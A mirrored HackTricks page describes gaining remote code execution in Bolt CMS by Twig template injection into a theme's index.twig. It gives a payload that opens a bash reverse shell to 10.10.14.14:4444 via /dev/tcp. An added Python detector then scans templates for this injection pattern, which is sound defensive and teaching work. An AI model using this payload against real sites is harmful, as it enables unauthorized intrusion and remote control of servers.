mirror of https://github.com/HackTricks-wiki/hacktricks.git, synced 2025-10-10 18:36:50 +00:00
Bolt CMS
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
RCE
After logging in as admin (go to `/bolt` to access the login prompt), you can get RCE in Bolt CMS:

- Select Configuration -> View Configuration -> Main Configuration, or go to the URL path `/bolt/file-edit/config?file=/bolt/config.yaml`
  - Check the value of theme
- Select File management -> View & edit templates
  - Select the theme base found in the previous step (`base-2021` in this case) and select `index.twig`
  - In my case this is in the URL path `/bolt/file-edit/themes?file=/base-2021/index.twig`
- Set your payload in this file via template injection (Twig), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
  - And save changes
- Clear the cache in Maintenance -> Clear the cache
- Access the page again as a regular user, and the payload should be executed
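
A defender-side check for the template change described above, as an added example that is not part of the original page: it scans theme `.twig` files for callback filters that are handed a quoted function name, as in `filter('system')`. Covering `map`, `sort` and `reduce` goes beyond the `filter` case shown on the page; the function names `scan_template` and `scan_theme_dir` and the sample template are constructed for illustration.

```python
import re
from pathlib import Path

# Twig filters that take a callback argument. The page's payload uses `filter`;
# map/sort/reduce are included here as a generalization (assumption of this example).
CALLBACK_FILTERS = ("filter", "map", "sort", "reduce")

# Matches |filter('name') or | map("name"): the first argument is a quoted string
# (a PHP function name) instead of an arrow function such as `v => v.published`.
STRING_CALLBACK = re.compile(
    r"\|\s*(?P<filter>" + "|".join(CALLBACK_FILTERS) + r")\s*\(\s*"
    r"(?P<q>['\"])(?P<func>[^'\"]+)(?P=q)"
)

def scan_template(text):
    """Return (line_number, filter, function_name) for each string callback."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in STRING_CALLBACK.finditer(line):
            findings.append((lineno, m.group("filter"), m.group("func")))
    return findings

def scan_theme_dir(root):
    """Scan every *.twig file under root; return {path: findings} for hits only."""
    report = {}
    for path in Path(root).rglob("*.twig"):
        hits = scan_template(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample template (not from a real site): line 3 carries the
# pattern shown on this page, lines 2 and 4 are legitimate arrow callbacks.
SAMPLE = """<h1>{{ record.title }}</h1>
{% for item in items|filter(v => v.published) %}{{ item.title }}{% endfor %}
{{['echo constructed-sample']|filter('system')}}
{{ prices|map(p => p * 1.2)|join(', ') }}
"""

if __name__ == "__main__":
    for lineno, flt, func in scan_template(SAMPLE):
        print(f"line {lineno}: |{flt}('{func}') passes a function name as callback")
```

Run `scan_theme_dir` against the themes directory of a deployment and diff the result against the theme's upstream copy; any string callback that is not in the upstream template deserves review.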